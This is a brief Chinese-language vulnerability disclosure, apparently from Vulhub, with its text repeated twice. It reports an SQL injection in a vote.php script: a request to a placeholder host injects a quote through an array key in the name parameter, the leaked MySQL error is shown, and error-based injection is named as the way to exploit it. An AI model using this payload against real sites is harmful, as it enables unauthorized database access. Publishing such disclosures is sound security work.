VULHUB ™

<p>会记录cookie ，请求一次清除一下cookie。</p><p><a href="http://xxx.com/vote.php?act=dovote&amp;name" rel="nofollow">http://xxx.com/vote.php?act=dovote&amp;name</a>[a%27][111]=aa</p><p>MySQL server error report:Array ( [0] =&gt; Array ( [message] =&gt; MySQL Query Error ) [1] =&gt; Array ( [sql] =&gt; select * from t_vote_result where name = 'aa' and vote_id = 0 and vote_ask_id = a\' ) [2] =&gt; Array ( [error] =&gt; You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1 ) [3] =&gt; Array ( [errno] =&gt; 1064 ) )&nbsp;</p><p>利用直接暴错方式注入</p>

<p>会记录cookie ，请求一次清除一下cookie。</p><p><a href="http://xxx.com/vote.php?act=dovote&amp;name" rel="nofollow">http://xxx.com/vote.php?act=dovote&amp;name</a>[a%27][111]=aa</p><p>MySQL server error report:Array ( [0] =&gt; Array ( [message] =&gt; MySQL Query Error ) [1] =&gt; Array ( [sql] =&gt; select * from t_vote_result where name = 'aa' and vote_id = 0 and vote_ask_id = a\' ) [2] =&gt; Array ( [error] =&gt; You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1 ) [3] =&gt; Array ( [errno] =&gt; 1064 ) )&nbsp;</p><p>利用直接暴错方式注入</p>